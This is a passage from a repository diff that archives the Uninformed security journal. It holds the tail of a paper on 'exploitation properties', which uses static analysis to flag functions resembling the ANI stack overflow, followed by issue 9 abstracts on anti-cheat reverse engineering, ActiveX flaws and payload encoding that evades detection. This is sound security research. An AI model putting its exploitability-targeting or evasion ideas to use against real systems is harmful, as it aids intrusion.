When running the analysis tool against the target binary, the following output
|
||||
is shown:
|
||||
|
||||
>PhaseRunner.exe detectani.xml dfa.exe
|
||||
Running phase: ANI Detection ... 1 target(s)
|
||||
|
||||
Displaying 3 normalizables at the
|
||||
ProgramElement.Method granularity...
|
||||
|
||||
00001: dfa!tc_df_pass_local_ptr_to_callee_alias
|
||||
00002: dfa!tc_df_pass_local_ptr_to_callee
|
||||
00003: dfa!tc_df_pass_local_ptr_to_callee_alias_struct
|
||||
|
||||
While this unfortunately does not prove that these techniques could be used to
|
||||
identify the function containing the ANI vulnerability, it does nevertheless
|
||||
hint at the potential for detecting the function containing the ANI
|
||||
vulnerability using its suggested exploitation and vulnerability properties.
|
||||
As an side, another interesting way in which this type of detection can be
|
||||
accomplished is through the use of Language Integrated Queries (LINQ) which
|
||||
are now supported in Visual Studio 2008[11]. For instance, a simple LINQ
|
||||
expression for the above narrowing operation can be expressed as:
|
||||
|
||||
var matches =
|
||||
from
|
||||
Method method in engine.GetScopeMethods()
|
||||
where
|
||||
!method.IsGuardStackEnabled() &&
|
||||
method.IsPassingStackLocalPtrToChild()
|
||||
select method;
|
||||
|
||||
foreach (var method in matches)
|
||||
Console.WriteLine("{0} matches", method);
|
||||
|
||||
4) Potential Uses
|
||||
|
||||
Program analysis is one area that may benefit from the use of exploitation
|
||||
properties. In particular, an auditor can make use of exploitation properties
|
||||
to assist in the process of identifying regions of code that should be audited
|
||||
more closely or with greater precedence. This determination can be made by
|
||||
using exploitation properties to understand the ease of exploitation
|
||||
associated with specific binaries or functions. By combining this information
|
||||
with other data that is collected either manually or automatically, an auditor
|
||||
can get a better understanding of the security aspects that are associated
|
||||
with a system. This is beneficial both to an attacker and a defender. An
|
||||
attacker can identify regions of code that would be easier to exploit and thus
|
||||
devote more time to auditing those regions. Likewise, a defender can use this
|
||||
information to the same extent but for different purposes. This type of
|
||||
information is especially useful to a defender who needs to balance the cost
|
||||
associated with performing security reviews because it should offer a better
|
||||
understanding of what the business cost might be if a vulnerability is found
|
||||
in a region of code. This cost can be derived from the negative publicity and
|
||||
response effort needed to cope with a flaw that is found publicly in a region
|
||||
of code that is widely exploited. For example, consider some of the Windows
|
||||
flaws that have lead to wormable issues and the cost they have had relative to
|
||||
other issues.
|
||||
|
||||
Exploitation properties may also benefit the security community by helping to
|
||||
identify ways in which future mitigations can be applied. This would involve
|
||||
analyzing regions of code that could be more easily exploited in an effort to
|
||||
determine what other forms of mitigations could help to protect these regions,
|
||||
if any. This information could be fed back to the compiler to make it
|
||||
possible for mitigations to be enabled that might otherwise be disabled by
|
||||
default. For example, a function that by default would not have GS but is
|
||||
subsequently found to be highly exploitable may benefit from having the
|
||||
compiler insert GS.
|
||||
|
||||
5) Future Work
|
||||
|
||||
While this paper has defined exploitation properties and described a handful
|
||||
of concrete examples, it has not attempted to formally define the correlation
|
||||
between exploitation properties and the exploitation techniques they are
|
||||
associated with. Future research will attempt to concretely define this
|
||||
relationship as it should lead to a better understanding of the variables that
|
||||
permit the use of various exploitation techniques. Using more formal
|
||||
definitions of exploitation properties, a larger scale case study can be
|
||||
completed which collects data about the effect of using exploitation
|
||||
properties to improve program understanding for a variety of purposes. The
|
||||
author views exploitation properties as being one component in a larger model.
|
||||
This larger model could be used to join major areas of study within computer
|
||||
security including attack surface analysis, vulnerability analysis, and
|
||||
exploitation analysis to form a more complete understanding of the true risks
|
||||
associated with a system.
|
||||
|
||||
6) Conclusion
|
||||
|
||||
This paper has introduced the general concept of exploitation properties and
|
||||
described how they can be used to better understand the exploitability of a
|
||||
system. The purpose of an exploitation property is to help convey the ease
|
||||
with which a vulnerability might be exploited if one is found to be present.
|
||||
Exploitation properties can be broken down into different categories based on
|
||||
the configuration or context that a given property is associated from. These
|
||||
categories include operating platforms, running processes, binary modules, and
|
||||
functions.
|
||||
|
||||
Exploitation properties can be used to provide an alternative understanding of
|
||||
an application's attack surface from the perspective of which areas would be
|
||||
most trivially exploited. This can allow an attacker to focus on finding
|
||||
security issues in code that would be more easily exploited. Likewise, a
|
||||
defender can draw the same conclusions and direct resources of their own at
|
||||
reviewing the associated code. It may also be possible to use this
|
||||
information to augment existing mitigations or to come up with new
|
||||
mitigations. A contrived example based on the form of the ANI vulnerability
|
||||
was used to illustrate an automated approach to extracting exploitation
|
||||
properties and using them to help identify a constrained subset of regions of
|
||||
code that meet a specific criteria. Future research will attempt to better
|
||||
define the extent of exploitation properties and their uses.
|
||||
|
||||
[1] Dowd, M., Metha, N., McDonald, J. Breaking C++ Applications.
|
||||
https://www.blackhat.com/presentations/bh-usa-07/Dowd_McDonald_and_Mehta/Whitepaper/bh-usa-07-dowd_mcdonald_and_mehta.pdf
|
||||
|
||||
[2] Durden, Tyler. Bypassing PaX ASLR Protection. July, 2002.
|
||||
http://www.phrack.org/issues.html?issue=59&id=9
|
||||
|
||||
[3] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!).
|
||||
http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx
|
||||
|
||||
[4] Johnson, Richard. Windows Vista: Exploitation Countermeasures.
|
||||
http://rjohnson.uninformed.org/
|
||||
|
||||
[5] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention
|
||||
Mechanism of Microsoft Windows 2003 Server.
|
||||
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf
|
||||
|
||||
[6] Metasploit. Exploiting the ANI vulnerability on Vista.
|
||||
http://blog.metasploit.com/2007/04/exploiting-ani-vulnerability-on-vista.html
|
||||
|
||||
[7] Microsoft Corporation. Microsoft Security Bulletin MS05-002. Jan, 2005.
|
||||
http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
|
||||
|
||||
[8] Microsoft Corporation. /GS (Buffer Security Check).
|
||||
http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx
|
||||
|
||||
[9] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers).
|
||||
http://msdn2.microsoft.com/en-us/library/9a89h429.aspx
|
||||
|
||||
[10] Microsoft Corporation. A detailed description of the Data Execution
|
||||
Prevention (DEP) feature. http://support.microsoft.com/kb/875352
|
||||
|
||||
[11] Microsoft Corporation. The LINQ Project.
|
||||
http://msdn2.microsoft.com/en-us/netframework/aa904594.aspx
|
||||
|
||||
[12] Microsoft Corporation. Phoenix. http://research.microsoft.com/phoenix/
|
||||
|
||||
[13] Microsoft Corporation. Microsoft Portable Executable and Object File
|
||||
Format Specification.
|
||||
http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/pecoff_v8.doc
|
||||
|
||||
[14] Microsoft Corporation. Threat Modeling. June, 2003.
|
||||
http://msdn2.microsoft.com/en-us/library/aa302419.aspx
|
||||
|
||||
[15] PaX Team. ASLR. http://pax.grsecurity.net/docs/aslr.txt
|
||||
|
||||
[16] Ren, Chris et al. Microsoft Compiler Flaw Technical Note.
|
||||
http://www.cigital.com/news/index.php?pg=art&artid=70
|
||||
|
||||
[17] Rahbar, Ali. An analysis of Microsoft Windows Vista's ASLR. Oct, 2006.
|
||||
http://www.sysdream.com/articles/Analysis-of-Microsoft-Windows-Vista's-ASLR.pdf
|
||||
|
||||
[18] skape, Skywing. Bypassing Windows Hardware-enforced DEP.
|
||||
http://www.uninformed.org/?v=2&a=4&t=sumry
|
||||
|
||||
[19] skape. Preventing the Exploitation of SEH Overwrites.
|
||||
http://www.uninformed.org/?v=5&a=2&t=sumry
|
||||
|
||||
[20] skape. Reducing the Effective Entropy of GS Cookies.
|
||||
http://www.uninformed.org/?v=7&a=2&t=sumry
|
||||
|
||||
[21] Skywing. Vista ASLR is not on by default for image base addresses.
|
||||
http://www.nynaeve.net/?p=100
|
||||
|
||||
[22] Sotirov, Alexander. Windows Animated Cursor Stack Overflow
|
||||
Vulnerability. March, 2007.
|
||||
http://www.determina.com/security.research/vulnerabilities/ani-header.html
|
||||
|
||||
[23] Wikipedia. Stack-smashing protection.
|
||||
http://en.wikipedia.org/wiki/Stack-smashing_protection
|
||||
|
||||
[24] Wikipedia. Address space layout randomization.
|
||||
http://en.wikipedia.org/wiki/ASLR
|
||||
|
||||
[25] Wikipedia. Static single assignment form.
|
||||
http://en.wikipedia.org/wiki/Static_single_assignment_form
|
||||
|
||||
[26] University of Wisconsin. Wisconsin Program-Slicing Project's Home Page.
|
||||
http://www.cs.wisc.edu/wpis/html/
|
||||
|
||||
[27] Whitehouse, Ollie. Analysis of GS protections in Microsoft Windows
|
||||
Vista. http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf
|
22
uninformed/9.txt
Normal file
22
uninformed/9.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
Engineering in Reverse
|
||||
An Objective Analysis of the Lockdown Protection System for Battle.net
|
||||
Skywing
|
||||
Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
|
||||
html | pdf | txt
|
||||
|
||||
Exploitation Technology
|
||||
ActiveX - Active Exploitation
|
||||
warlord
|
||||
This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
|
||||
html | pdf | txt
|
||||
|
||||
Context-keyed Payload Encoding
|
||||
I)ruid
|
||||
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.
|
||||
html | pdf | txt
|
||||
|
||||
Improving Software Security Analysis using Exploitation Properties
|
||||
skape
|
||||
Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.
|
||||
html | pdf | txt
|
||||
|
BIN
uninformed/code.1.1.tgz
Normal file
BIN
uninformed/code.1.1.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.1.4.tgz
Normal file
BIN
uninformed/code.1.4.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.2.2.tgz
Normal file
BIN
uninformed/code.2.2.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.3.3.tgz
Normal file
BIN
uninformed/code.3.3.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.3.6.tgz
Normal file
BIN
uninformed/code.3.6.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.4.4.tgz
Normal file
BIN
uninformed/code.4.4.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.6.1.tgz
Normal file
BIN
uninformed/code.6.1.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.6.2.tgz
Normal file
BIN
uninformed/code.6.2.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.6.3.tgz
Normal file
BIN
uninformed/code.6.3.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.7.1.tgz
Normal file
BIN
uninformed/code.7.1.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.7.2.tgz
Normal file
BIN
uninformed/code.7.2.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.8.1.tgz
Normal file
BIN
uninformed/code.8.1.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.8.2.tgz
Normal file
BIN
uninformed/code.8.2.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.8.3.tgz
Normal file
BIN
uninformed/code.8.3.tgz
Normal file
Binary file not shown.
BIN
uninformed/code.8.4.zip
Normal file
BIN
uninformed/code.8.4.zip
Normal file
Binary file not shown.
BIN
uninformed/code.8.6.tgz
Normal file
BIN
uninformed/code.8.6.tgz
Normal file
Binary file not shown.
Loading…
Add table
Reference in a new issue